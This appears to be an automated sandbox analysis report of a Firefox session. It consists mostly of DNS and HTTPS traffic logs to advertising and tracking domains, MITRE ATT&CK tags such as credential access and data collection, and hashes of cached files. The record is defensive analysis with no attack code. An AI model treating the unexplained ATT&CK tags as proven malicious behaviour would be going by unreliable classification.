
18.66.171.56
8.8.8.8:53

config.aps.amazon-adsystem.com

dns

firefox.exe

76 B
158 B
1
1

DNS Request

config.aps.amazon-adsystem.com
8.8.8.8:53

234.23.67.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

234.23.67.172.in-addr.arpa
8.8.8.8:53

70.2.26.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

70.2.26.104.in-addr.arpa
8.8.8.8:53

37.62.75.3.in-addr.arpa

dns

69 B
132 B
1
1

DNS Request

37.62.75.3.in-addr.arpa
8.8.8.8:53

aax.amazon-adsystem.com

dns

firefox.exe

69 B
201 B
1
1

DNS Request

aax.amazon-adsystem.com

DNS Response

3.162.148.221
8.8.8.8:53

11.1.250.178.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

11.1.250.178.in-addr.arpa
8.8.8.8:53

198.40.223.52.in-addr.arpa

dns

72 B
128 B
1
1

DNS Request

198.40.223.52.in-addr.arpa
8.8.8.8:53

83.138.19.162.in-addr.arpa

dns

72 B
113 B
1
1

DNS Request

83.138.19.162.in-addr.arpa
8.8.8.8:53

d1jvc9b8z3vcjs.cloudfront.net

dns

firefox.exe

75 B
91 B
1
1

DNS Request

d1jvc9b8z3vcjs.cloudfront.net

DNS Response

3.162.148.221
8.8.8.8:53

55.133.120.34.in-addr.arpa

dns

72 B
124 B
1
1

DNS Request

55.133.120.34.in-addr.arpa
8.8.8.8:53

d1jvc9b8z3vcjs.cloudfront.net

dns

firefox.exe

75 B
162 B
1
1

DNS Request

d1jvc9b8z3vcjs.cloudfront.net
34.120.133.55:443

api.rlcdn.com

https

firefox.exe

1.9kB
7.4kB
6
8
8.8.8.8:53

190.96.197.44.in-addr.arpa

dns

72 B
127 B
1
1

DNS Request

190.96.197.44.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa
8.8.8.8:53

194.23.211.130.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

194.23.211.130.in-addr.arpa
130.211.23.194:443

api.btloader.com

https

firefox.exe

1.9kB
5.9kB
6
7
8.8.8.8:53

ids.ad.gt

dns

firefox.exe

55 B
145 B
1
1

DNS Request

ids.ad.gt

DNS Response

104.22.5.69

172.67.23.234

104.22.4.69
34.160.152.31:443

c.pub.network

https

firefox.exe

3.0kB
6.1kB
9
9
8.8.8.8:53

secure.adnxs.com

dns

firefox.exe

62 B
323 B
1
1

DNS Request

secure.adnxs.com

DNS Response

185.89.210.82

185.89.210.244

185.89.210.20

185.89.210.212

185.89.210.153

185.89.211.84

185.89.210.46

185.89.210.180

185.89.211.116

185.89.210.122

185.89.210.90

185.89.210.141
8.8.8.8:53

ids.ad.gt.cdn.cloudflare.net

dns

firefox.exe

74 B
122 B
1
1

DNS Request

ids.ad.gt.cdn.cloudflare.net

DNS Response

104.22.4.69

172.67.23.234

104.22.5.69
8.8.8.8:53

ib.anycast.adnxs.com

dns

firefox.exe

66 B
258 B
1
1

DNS Request

ib.anycast.adnxs.com

DNS Response

185.89.210.20

185.89.210.141

185.89.211.84

185.89.211.116

185.89.210.46

185.89.210.212

185.89.210.180

185.89.210.82

185.89.210.122

185.89.210.153

185.89.210.244

185.89.210.90
8.8.8.8:53

image2.pubmatic.com

dns

firefox.exe

65 B
137 B
1
1

DNS Request

image2.pubmatic.com

DNS Response

198.47.127.205
8.8.8.8:53

token.rubiconproject.com

dns

firefox.exe

70 B
151 B
1
1

DNS Request

token.rubiconproject.com

DNS Response

69.173.156.148

69.173.156.149
8.8.8.8:53

cm.g.doubleclick.net

dns

firefox.exe

66 B
82 B
1
1

DNS Request

cm.g.doubleclick.net

DNS Response

142.250.200.2
8.8.8.8:53

ids.ad.gt.cdn.cloudflare.net

dns

firefox.exe

74 B
158 B
1
1

DNS Request

ids.ad.gt.cdn.cloudflare.net

DNS Response

2606:4700:10::ac43:17ea

2606:4700:10::6816:445

2606:4700:10::6816:545
8.8.8.8:53

ib.anycast.adnxs.com

dns

firefox.exe

66 B
131 B
1
1

DNS Request

ib.anycast.adnxs.com
8.8.8.8:53

pug-ams-bc.pubmnet.com

dns

firefox.exe

68 B
84 B
1
1

DNS Request

pug-ams-bc.pubmnet.com

DNS Response

198.47.127.205
8.8.8.8:53

cm.g.doubleclick.net

dns

firefox.exe

66 B
82 B
1
1

DNS Request

cm.g.doubleclick.net

DNS Response

142.250.179.226
8.8.8.8:53

pixel.rubiconproject.net.akadns.net

dns

firefox.exe

81 B
113 B
1
1

DNS Request

pixel.rubiconproject.net.akadns.net

DNS Response

69.173.156.149

69.173.156.148
8.8.8.8:53

pug-ams-bc.pubmnet.com

dns

firefox.exe

68 B
133 B
1
1

DNS Request

pug-ams-bc.pubmnet.com
8.8.8.8:53

cm.g.doubleclick.net

dns

firefox.exe

66 B
126 B
1
1

DNS Request

cm.g.doubleclick.net
8.8.8.8:53

pixel.rubiconproject.net.akadns.net

dns

firefox.exe

81 B
147 B
1
1

DNS Request

pixel.rubiconproject.net.akadns.net
8.8.8.8:53

ad.360yield.com

dns

firefox.exe

61 B
229 B
1
1

DNS Request

ad.360yield.com

DNS Response

52.48.62.133

54.74.233.226

52.209.247.91

52.51.146.36

52.213.95.172

52.208.202.34

52.18.168.73

34.250.191.7
8.8.8.8:53

sync.go.sonobi.com

dns

firefox.exe

64 B
153 B
1
1

DNS Request

sync.go.sonobi.com

DNS Response

69.166.1.66

69.166.1.67

69.166.1.35

69.166.1.34
8.8.8.8:53

u.openx.net

dns

firefox.exe

57 B
89 B
1
1

DNS Request

u.openx.net

DNS Response

35.244.159.8

34.98.64.218
8.8.8.8:53

p.ad.gt

dns

firefox.exe

53 B
141 B
1
1

DNS Request

p.ad.gt

DNS Response

104.22.4.69

172.67.23.234

104.22.5.69
8.8.8.8:53

euw-ice.360yield.com

dns

firefox.exe

66 B
194 B
1
1

DNS Request

euw-ice.360yield.com

DNS Response

54.155.206.189

34.250.191.7

52.212.132.56

54.74.233.226

52.48.62.133

52.210.157.137

52.48.59.220

52.48.56.87
8.8.8.8:53

u.openx.net

dns

firefox.exe

57 B
89 B
1
1

DNS Request

u.openx.net

DNS Response

34.98.64.218

35.244.159.8
8.8.8.8:53

iad-2-sync.go.sonobi.com

dns

firefox.exe

70 B
134 B
1
1

DNS Request

iad-2-sync.go.sonobi.com

DNS Response

69.166.1.67

69.166.1.66

69.166.1.35

69.166.1.34
8.8.8.8:53

euw-ice.360yield.com

dns

firefox.exe

66 B
148 B
1
1

DNS Request

euw-ice.360yield.com
8.8.8.8:53

u.openx.net

dns

firefox.exe

128 B
237 B
2
2

DNS Request

u.openx.net

DNS Request

tpc.googlesyndication.com

DNS Response

172.217.16.225
8.8.8.8:53

iad-2-sync.go.sonobi.com

dns

firefox.exe

70 B
182 B
1
1

DNS Request

iad-2-sync.go.sonobi.com

DNS Response

2607:f350:3:2569:0:10:0:200c

2607:f350:3:2569:0:10:0:c

2607:f350:3:2569:0:10:0:200d

2607:f350:3:2569:0:10:0:d
8.8.8.8:53

p.ad.gt.cdn.cloudflare.net

dns

firefox.exe

72 B
120 B
1
1

DNS Request

p.ad.gt.cdn.cloudflare.net

DNS Response

104.22.5.69

104.22.4.69

172.67.23.234
8.8.8.8:53

dnacdn.net

dns

firefox.exe

56 B
72 B
1
1

DNS Request

dnacdn.net

DNS Response

178.250.7.13
8.8.8.8:53

p.ad.gt.cdn.cloudflare.net

dns

firefox.exe

72 B
156 B
1
1

DNS Request

p.ad.gt.cdn.cloudflare.net

DNS Response

2606:4700:10::ac43:17ea

2606:4700:10::6816:445

2606:4700:10::6816:545
8.8.8.8:53

dnacdn.net

dns

firefox.exe

56 B
72 B
1
1

DNS Request

dnacdn.net

DNS Response

178.250.7.13
8.8.8.8:53

6.200.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

6.200.250.142.in-addr.arpa
8.8.8.8:53

221.148.162.3.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

221.148.162.3.in-addr.arpa
8.8.8.8:53

dnacdn.net

dns

firefox.exe

56 B
110 B
1
1

DNS Request

dnacdn.net
8.8.8.8:53

lb.eu-1-id5-sync.com

dns

firefox.exe

66 B
226 B
1
1

DNS Request

lb.eu-1-id5-sync.com

DNS Response

162.19.138.82

162.19.138.83

162.19.138.120

162.19.138.117

141.95.98.65

162.19.138.116

141.95.33.120

162.19.138.119

141.95.98.64

162.19.138.118
8.8.8.8:53

lb.eu-1-id5-sync.com

dns

firefox.exe

66 B
226 B
1
1

DNS Request

lb.eu-1-id5-sync.com

DNS Response

162.19.138.116

141.95.98.65

141.95.33.120

162.19.138.82

162.19.138.118

141.95.98.64

162.19.138.120

162.19.138.83

162.19.138.117

162.19.138.119
8.8.8.8:53

lb.eu-1-id5-sync.com

dns

firefox.exe

66 B
125 B
1
1

DNS Request

lb.eu-1-id5-sync.com
8.8.8.8:53

rp.liadm.com

dns

firefox.exe

58 B
236 B
1
1

DNS Request

rp.liadm.com

DNS Response

3.233.179.64

35.153.151.120

3.217.103.161

3.82.81.96

100.25.66.205

44.219.83.99

18.210.34.134

44.214.84.153
8.8.8.8:53

livepixel-production.bln.liveintent.com

dns

firefox.exe

85 B
213 B
1
1

DNS Request

livepixel-production.bln.liveintent.com

DNS Response

34.230.98.106

3.233.179.64

3.82.81.96

44.223.244.62

34.203.127.214

35.153.151.120

3.92.155.74

100.25.66.205
8.8.8.8:53

secure.cdn.fastclick.net

dns

firefox.exe

70 B
167 B
1
1

DNS Request

secure.cdn.fastclick.net

DNS Response

23.53.174.156
8.8.8.8:53

cdn.id5-sync.com

dns

firefox.exe

62 B
110 B
1
1

DNS Request

cdn.id5-sync.com

DNS Response

104.22.53.86

172.67.38.106

104.22.52.86
8.8.8.8:53

livepixel-production.bln.liveintent.com

dns

firefox.exe

85 B
309 B
1
1

DNS Request

livepixel-production.bln.liveintent.com

DNS Response

2600:1f18:730:b130:bc58:c2f6:a336:a8c1

2600:1f18:730:b130:7cc9:4de4:bdd9:c825

2600:1f18:730:b110:87d9:eafb:1066:1389

2600:1f18:730:b150:ed7:b5a8:b001:32bf

2600:1f18:730:b150:4be:4d7f:78bf:7b32

2600:1f18:730:b110:da22:a7e9:2a83:baa4

2600:1f18:730:b130:e56:b6ca:9d8e:84e0

2600:1f18:730:b120:f176:60c3:7be3:d10d
8.8.8.8:53

e4536.g.akamaiedge.net

dns

firefox.exe

68 B
84 B
1
1

DNS Request

e4536.g.akamaiedge.net

DNS Response

23.53.174.156
8.8.8.8:53

cdn.id5-sync.com

dns

firefox.exe

62 B
110 B
1
1

DNS Request

cdn.id5-sync.com

DNS Response

172.67.38.106

104.22.53.86

104.22.52.86
8.8.8.8:53

e4536.g.akamaiedge.net

dns

firefox.exe

68 B
129 B
1
1

DNS Request

e4536.g.akamaiedge.net
8.8.8.8:53

cdn.id5-sync.com

dns

firefox.exe

62 B
146 B
1
1

DNS Request

cdn.id5-sync.com

DNS Response

2606:4700:10::6816:3556

2606:4700:10::ac43:266a

2606:4700:10::6816:3456
8.8.8.8:53

125.171.66.18.in-addr.arpa

dns

72 B
129 B
1
1

DNS Request

125.171.66.18.in-addr.arpa
8.8.8.8:53

69.4.22.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

69.4.22.104.in-addr.arpa
142.250.200.2:443

cm.g.doubleclick.net

https

firefox.exe

9.0kB
23.9kB
22
40
35.244.159.8:443

u.openx.net

https

firefox.exe

4.9kB
7.8kB
11
14
8.8.8.8:53

2.200.250.142.in-addr.arpa

dns

72 B
110 B
1
1

DNS Request

2.200.250.142.in-addr.arpa
8.8.8.8:53

148.156.173.69.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

148.156.173.69.in-addr.arpa
8.8.8.8:53

82.210.89.185.in-addr.arpa

dns

72 B
133 B
1
1

DNS Request

82.210.89.185.in-addr.arpa
8.8.8.8:53

8.159.244.35.in-addr.arpa

dns

71 B
122 B
1
1

DNS Request

8.159.244.35.in-addr.arpa
8.8.8.8:53

205.127.47.198.in-addr.arpa

dns

73 B
127 B
1
1

DNS Request

205.127.47.198.in-addr.arpa
8.8.8.8:53

133.62.48.52.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

133.62.48.52.in-addr.arpa
8.8.8.8:53

13.7.250.178.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

13.7.250.178.in-addr.arpa
8.8.8.8:53

82.138.19.162.in-addr.arpa

dns

72 B
113 B
1
1

DNS Request

82.138.19.162.in-addr.arpa
8.8.8.8:53

66.1.166.69.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

66.1.166.69.in-addr.arpa
8.8.8.8:53

86.53.22.104.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

86.53.22.104.in-addr.arpa
8.8.8.8:53

156.174.53.23.in-addr.arpa

dns

72 B
137 B
1
1

DNS Request

156.174.53.23.in-addr.arpa
8.8.8.8:53

64.179.233.3.in-addr.arpa

dns

71 B
125 B
1
1

DNS Request

64.179.233.3.in-addr.arpa
8.8.8.8:53

www.google.com

dns

firefox.exe

60 B
88 B
1
1

DNS Request

www.google.com

DNS Response

2a00:1450:4009:81f::2004
216.58.201.98:443

googleads.g.doubleclick.net

https

firefox.exe

1.9kB
3.3kB
5
10
216.58.213.6:443

static.doubleclick.net

https

firefox.exe

1.6kB
2.2kB
3
4
172.217.169.42:443

jnn-pa.googleapis.com

https

firefox.exe

3.6kB
46.9kB
10
40
8.8.8.8:53

7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com

dns

firefox.exe

110 B
169 B
1
1

DNS Request

7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com

DNS Response

172.217.169.65
130.211.23.194:443

api.btloader.com

https

firefox.exe

1.9kB
5.9kB
6
7
8.8.8.8:53

pagead-googlehosted.l.google.com

dns

firefox.exe

78 B
94 B
1
1

DNS Request

pagead-googlehosted.l.google.com

DNS Response

172.217.169.65
8.8.8.8:53

pagead-googlehosted.l.google.com

dns

firefox.exe

78 B
106 B
1
1

DNS Request

pagead-googlehosted.l.google.com

DNS Response

2a00:1450:4009:819::2001
172.217.169.65:443

pagead-googlehosted.l.google.com

https

firefox.exe

3.2kB
7.1kB
7
8
8.8.8.8:53

65.169.217.172.in-addr.arpa

dns

73 B
111 B
1
1

DNS Request

65.169.217.172.in-addr.arpa
8.8.8.8:53

226.179.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

226.179.250.142.in-addr.arpa
8.8.8.8:53

s2s.t13.io

dns

firefox.exe

56 B
72 B
1
1

DNS Request

s2s.t13.io

DNS Response

34.107.140.113
8.8.8.8:53

s2s.t13.io

dns

firefox.exe

56 B
72 B
1
1

DNS Request

s2s.t13.io

DNS Response

34.107.140.113
8.8.8.8:53

s2s.t13.io

dns

firefox.exe

56 B
149 B
1
1

DNS Request

s2s.t13.io
8.8.8.8:53

prebid.media.net

dns

firefox.exe

62 B
78 B
1
1

DNS Request

prebid.media.net

DNS Response

34.120.63.153
8.8.8.8:53

ib.adnxs.com

dns

firefox.exe

58 B
319 B
1
1

DNS Request

ib.adnxs.com

DNS Response

185.89.210.90

185.89.210.46

185.89.210.82

185.89.211.116

185.89.210.141

185.89.210.180

185.89.210.122

185.89.210.153

185.89.211.84

185.89.210.212

185.89.210.20

185.89.210.244
8.8.8.8:53

prebid.media.net

dns

firefox.exe

62 B
78 B
1
1

DNS Request

prebid.media.net

DNS Response

34.120.63.153
8.8.8.8:53

bidder.criteo.com

dns

firefox.exe

63 B
113 B
1
1

DNS Request

bidder.criteo.com

DNS Response

178.250.1.8
8.8.8.8:53

ib.anycast.adnxs.com

dns

firefox.exe

66 B
131 B
1
1

DNS Request

ib.anycast.adnxs.com
8.8.8.8:53

prebid.media.net

dns

firefox.exe

62 B
133 B
1
1

DNS Request

prebid.media.net
8.8.8.8:53

bidder.nl3.vip.prod.criteo.com

dns

firefox.exe

76 B
92 B
1
1

DNS Request

bidder.nl3.vip.prod.criteo.com

DNS Response

178.250.1.8
8.8.8.8:53

bidder.nl3.vip.prod.criteo.com

dns

firefox.exe

76 B
120 B
1
1

DNS Request

bidder.nl3.vip.prod.criteo.com
8.8.8.8:53

tpc.googlesyndication.com

dns

firefox.exe

71 B
87 B
1
1

DNS Request

tpc.googlesyndication.com

DNS Response

172.217.16.225
8.8.8.8:53

tpc.googlesyndication.com

dns

firefox.exe

71 B
99 B
1
1

DNS Request

tpc.googlesyndication.com

DNS Response

2a00:1450:4009:821::2001
34.107.140.113:443

s2s.t13.io

https

firefox.exe

19.9kB
11.6kB
40
38
8.8.8.8:53

113.140.107.34.in-addr.arpa

dns

73 B
126 B
1
1

DNS Request

113.140.107.34.in-addr.arpa
8.8.8.8:53

153.63.120.34.in-addr.arpa

dns

72 B
124 B
1
1

DNS Request

153.63.120.34.in-addr.arpa
8.8.8.8:53

8.1.250.178.in-addr.arpa

dns

70 B
124 B
1
1

DNS Request

8.1.250.178.in-addr.arpa
8.8.8.8:53

90.210.89.185.in-addr.arpa

dns

72 B
133 B
1
1

DNS Request

90.210.89.185.in-addr.arpa
34.120.63.153:443

prebid.media.net

https

firefox.exe

9.3kB
8.0kB
14
13
172.217.16.225:443

tpc.googlesyndication.com

https

firefox.exe

5.9kB
92.0kB
30
79
8.8.8.8:53

resources.infolinks.com

dns

firefox.exe

69 B
101 B
1
1

DNS Request

resources.infolinks.com

DNS Response

172.66.42.247

172.66.41.9
8.8.8.8:53

cdn.browsiprod.com

dns

firefox.exe

64 B
128 B
1
1

DNS Request

cdn.browsiprod.com

DNS Response

3.162.140.5

3.162.140.38

3.162.140.49

3.162.140.29
8.8.8.8:53

resources.infolinks.com

dns

firefox.exe

69 B
101 B
1
1

DNS Request

resources.infolinks.com

DNS Response

172.66.42.247

172.66.41.9
8.8.8.8:53

cdn.browsiprod.com

dns

firefox.exe

64 B
128 B
1
1

DNS Request

cdn.browsiprod.com

DNS Response

3.162.140.5

3.162.140.38

3.162.140.49

3.162.140.29
8.8.8.8:53

resources.infolinks.com

dns

firefox.exe

69 B
127 B
1
1

DNS Request

resources.infolinks.com
8.8.8.8:53

cdn.browsiprod.com

dns

firefox.exe

64 B
148 B
1
1

DNS Request

cdn.browsiprod.com
8.8.8.8:53

225.16.217.172.in-addr.arpa

dns

73 B
140 B
1
1

DNS Request

225.16.217.172.in-addr.arpa
8.8.8.8:53

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

dns

firefox.exe

106 B
187 B
1
1

DNS Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud
142.250.187.196:443

www.google.com

https

firefox.exe

1.6kB
2.2kB
3
4
8.8.8.8:53

events.browsiprod.com

dns

firefox.exe

67 B
163 B
1
1

DNS Request

events.browsiprod.com

DNS Response

52.89.16.229

44.228.230.119

44.237.6.87

35.166.89.22

52.26.112.13

44.238.197.96
8.8.8.8:53

events.browsiprod.com

dns

firefox.exe

67 B
163 B
1
1

DNS Request

events.browsiprod.com

DNS Response

44.238.197.96

52.89.16.229

52.26.112.13

44.228.230.119

35.166.89.22

44.237.6.87
8.8.8.8:53

yield-manager.browsiprod.com

dns

firefox.exe

74 B
138 B
1
1

DNS Request

yield-manager.browsiprod.com

DNS Response

3.162.140.33

3.162.140.99

3.162.140.24

3.162.140.41
8.8.8.8:53

5.140.162.3.in-addr.arpa

dns

70 B
125 B
1
1

DNS Request

5.140.162.3.in-addr.arpa
8.8.8.8:53

247.42.66.172.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

247.42.66.172.in-addr.arpa
8.8.8.8:53

events.browsiprod.com

dns

firefox.exe

67 B
151 B
1
1

DNS Request

events.browsiprod.com
8.8.8.8:53

yield-manager.browsiprod.com

dns

firefox.exe

74 B
138 B
1
1

DNS Request

yield-manager.browsiprod.com

DNS Response

3.162.140.24

3.162.140.41

3.162.140.99

3.162.140.33
8.8.8.8:53

yield-manager.browsiprod.com

dns

firefox.exe

74 B
158 B
1
1

DNS Request

yield-manager.browsiprod.com
8.8.8.8:53

pixel.rubiconproject.com

dns

firefox.exe

70 B
151 B
1
1

DNS Request

pixel.rubiconproject.com

DNS Response

69.173.156.148

69.173.156.149
8.8.8.8:53

pixel.rubiconproject.net.akadns.net

dns

firefox.exe

81 B
147 B
1
1

DNS Request

pixel.rubiconproject.net.akadns.net
8.8.8.8:53

chromewebstore.googleapis.com

dns

75 B
267 B
1
1

DNS Request

chromewebstore.googleapis.com

DNS Response

216.58.201.106

216.58.204.74

216.58.212.202

172.217.169.42

142.250.179.234

142.250.180.10

142.250.187.202

142.250.187.234

142.250.178.10

172.217.16.234

142.250.200.10

142.250.200.42
8.8.8.8:53

chromewebstore.googleapis.com

dns

75 B
132 B
1
1

DNS Request

chromewebstore.googleapis.com
8.8.8.8:53

106.201.58.216.in-addr.arpa

dns

73 B
173 B
1
1

DNS Request

106.201.58.216.in-addr.arpa
8.8.8.8:53

229.16.89.52.in-addr.arpa

dns

71 B
133 B
1
1

DNS Request

229.16.89.52.in-addr.arpa
8.8.8.8:53

33.140.162.3.in-addr.arpa

dns

71 B
127 B
1
1

DNS Request

33.140.162.3.in-addr.arpa
8.8.8.8:53

router.infolinks.com

dns

firefox.exe

66 B
98 B
1
1

DNS Request

router.infolinks.com

DNS Response

172.66.42.247

172.66.41.9
8.8.8.8:53

router.infolinks.com

dns

firefox.exe

66 B
98 B
1
1

DNS Request

router.infolinks.com

DNS Response

172.66.42.247

172.66.41.9
8.8.8.8:53

router.infolinks.com

dns

firefox.exe

66 B
124 B
1
1

DNS Request

router.infolinks.com
8.8.8.8:53

ssum-sec.casalemedia.com

dns

firefox.exe

70 B
102 B
1
1

DNS Request

ssum-sec.casalemedia.com

DNS Response

172.64.151.101

104.18.36.155
8.8.8.8:53

ssum-sec.casalemedia.com

dns

firefox.exe

70 B
102 B
1
1

DNS Request

ssum-sec.casalemedia.com

DNS Response

172.64.151.101

104.18.36.155
8.8.8.8:53

ssum-sec.casalemedia.com

dns

firefox.exe

70 B
131 B
1
1

DNS Request

ssum-sec.casalemedia.com
172.64.151.101:443

ssum-sec.casalemedia.com

https

firefox.exe

1.8kB
7.2kB
5
11
8.8.8.8:53

widgets.outbrain.com

dns

firefox.exe

66 B
163 B
1
1

DNS Request

widgets.outbrain.com

DNS Response

2.21.189.145
8.8.8.8:53

101.151.64.172.in-addr.arpa

dns

73 B
135 B
1
1

DNS Request

101.151.64.172.in-addr.arpa
8.8.8.8:53

e10883.g.akamaiedge.net

dns

firefox.exe

69 B
85 B
1
1

DNS Request

e10883.g.akamaiedge.net

DNS Response

2.21.189.145
8.8.8.8:53

e10883.g.akamaiedge.net

dns

firefox.exe

69 B
130 B
1
1

DNS Request

e10883.g.akamaiedge.net
8.8.8.8:53

cdn.ampproject.org

dns

firefox.exe

64 B
106 B
1
1

DNS Request

cdn.ampproject.org

DNS Response

142.250.187.225
8.8.8.8:53

cdn-content.ampproject.org

dns

firefox.exe

72 B
88 B
1
1

DNS Request

cdn-content.ampproject.org

DNS Response

142.250.187.225
8.8.8.8:53

cdn-content.ampproject.org

dns

firefox.exe

72 B
100 B
1
1

DNS Request

cdn-content.ampproject.org

DNS Response

2a00:1450:4009:820::2001
8.8.8.8:53

eb2.3lift.com

dns

firefox.exe

59 B
112 B
1
1

DNS Request

eb2.3lift.com

DNS Response

76.223.111.18

13.248.245.213
8.8.8.8:53

eu-eb2.3lift.com

dns

firefox.exe

62 B
94 B
1
1

DNS Request

eu-eb2.3lift.com

DNS Response

76.223.111.18

13.248.245.213
8.8.8.8:53

eu-eb2.3lift.com

dns

firefox.exe

62 B
146 B
1
1

DNS Request

eu-eb2.3lift.com
8.8.8.8:53

rt3013.infolinks.com

dns

firefox.exe

66 B
98 B
1
1

DNS Request

rt3013.infolinks.com

DNS Response

172.66.42.247

172.66.41.9
8.8.8.8:53

rt3013.infolinks.com

dns

firefox.exe

66 B
98 B
1
1

DNS Request

rt3013.infolinks.com

DNS Response

172.66.42.247

172.66.41.9
8.8.8.8:53

rt3013.infolinks.com

dns

firefox.exe

66 B
124 B
1
1

DNS Request

rt3013.infolinks.com
142.250.187.225:443

cdn-content.ampproject.org

https

firefox.exe

1.9kB
14.2kB
7
13
8.8.8.8:53

x.bidswitch.net

dns

firefox.exe

61 B
104 B
1
1

DNS Request

x.bidswitch.net

DNS Response

35.214.149.91
8.8.8.8:53

18.111.223.76.in-addr.arpa

dns

144 B
128 B
2
1

DNS Request

18.111.223.76.in-addr.arpa

DNS Request

18.111.223.76.in-addr.arpa
8.8.8.8:53

145.189.21.2.in-addr.arpa

dns

71 B
135 B
1
1

DNS Request

145.189.21.2.in-addr.arpa
8.8.8.8:53

225.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

225.187.250.142.in-addr.arpa
8.8.8.8:53

user-data-eu.bidswitch.net

dns

firefox.exe

72 B
88 B
1
1

DNS Request

user-data-eu.bidswitch.net

DNS Response

35.214.149.91
8.8.8.8:53

user-data-eu.bidswitch.net

dns

firefox.exe

72 B
124 B
1
1

DNS Request

user-data-eu.bidswitch.net
8.8.8.8:53

events.browsiprod.com

dns

firefox.exe

67 B
151 B
1
1

DNS Request

events.browsiprod.com
8.8.8.8:53

ai.browsiprod.com

dns

firefox.exe

63 B
127 B
1
1

DNS Request

ai.browsiprod.com

DNS Response

18.66.171.93

18.66.171.24

18.66.171.74

18.66.171.42
8.8.8.8:53

demand-engine.browsiprod.com

dns

firefox.exe

74 B
138 B
1
1

DNS Request

demand-engine.browsiprod.com

DNS Response

3.162.140.75

3.162.140.20

3.162.140.128

3.162.140.107
8.8.8.8:53

ai.browsiprod.com

dns

firefox.exe

63 B
127 B
1
1

DNS Request

ai.browsiprod.com

DNS Response

18.66.171.24

18.66.171.42

18.66.171.93

18.66.171.74
8.8.8.8:53

ai.browsiprod.com

dns

firefox.exe

63 B
147 B
1
1

DNS Request

ai.browsiprod.com
8.8.8.8:53

demand-engine.browsiprod.com

dns

firefox.exe

74 B
138 B
1
1

DNS Request

demand-engine.browsiprod.com

DNS Response

3.162.140.128

3.162.140.75

3.162.140.107

3.162.140.20

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\10126

Filesize
16KB

MD5
8e2790df1689c0c7dabddd0c12342d29

SHA1
2475ccf6b1040fe7cde1962bbc3d5722a6cbc015

SHA256
b4dfe23285f951e1268a8ba171f8649657108a38eda1bd699a289e917f6d059f

SHA512
41f876269220a440e32afbc4dfd29d51dcc94d9daf732910e671804198ed36623de374bf0c5646e6fe093bdc66dbfbb566e5af189698ade15931ebe494ab8959

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\10223

Filesize
16KB

MD5
e327b7f4d7363fc19155d8edd08c8295

SHA1
3c86beed71507393509940722b9cb1ef5acde85d

SHA256
4a5429e6aa40f47ee9d1ea1e307ea4d49e45b762e303380470d5142416da527e

SHA512
92cf170ab9a98db2259c0728940f07e37d0b22c735c8a5993fe85c2dba5b2594f9ca6b5f91c892c23d1c7a320b931759d8bcbae6c0698c6c217989d0816f831e

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\1520

Filesize
10KB

MD5
f0db58696a272567f6cdc3fc9991be6a

SHA1
8b991b522dfbf2e442490a883aa28f06c6bf1d39

SHA256
9dcbbcbb2b6f27e4f10592ab3a38df676f279613ea7ec13d12a26b1d0710947f

SHA512
1a0401cdbed11373ad3e8734e519c1d2864961971635f2ddfc45b5c0e7acd0f70958619be0ff2f0c29043bf190ca011e1d402149815899c098d81047c4228bef

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\15613

Filesize
16KB

MD5
9fb1d751ce9998ea0c633724e48430c0

SHA1
752a2e5c75c2bba34f89a6dd5dbc29cf3fc113f2

SHA256
e2077ba8ee3abc6f7c86cdfb1638cf16eeeaf3746f08748021a079a1f63f7a60

SHA512
08d60a8d9efa50fe4e2f21a08bedcd620748482204366a591ce988d06dae52657f9d587b5cddf5b5381da35fd9c1384671b69e2158c33f315058c19275285762

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\16495

Filesize
7KB

MD5
3b19115c794815634cfc38d3b5b16352

SHA1
628781d1d48f9c4f1382c224963839c5e879f64e

SHA256
de38f9243b6e492db893d5a93668d44492d302eb1c96b32ae80a280a1508307f

SHA512
be7035be8461506460537b36f7d429a4b58d79a3822634005c47e9778f8b4ddd006e789bb4e886a1705eecf72bb36c16e6bd361e3fa842f534401a0967222604

Download Submit
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\4s2odj76.default-release\cache2\doomed\16812

Filesize
16KB

MD5
80be7b63f7a8d0450d823b47edb984ef

SHA1
b418a1284fb5f2806c2ae47edb39f55850c14b5c

SHA256
ea6af26cbd7f97fc4eb20db1f069da20ffa86f2610f87a36f4aa0b9806496018

SHA512
08e315d2d4b618e07d6b91ce8dec26537da34eefb1d900c106ba439e4681cb6d26b00e4e717038c167f74aa569d2668b560418d038e08fe5fa49319bc9d87158

Download Submit
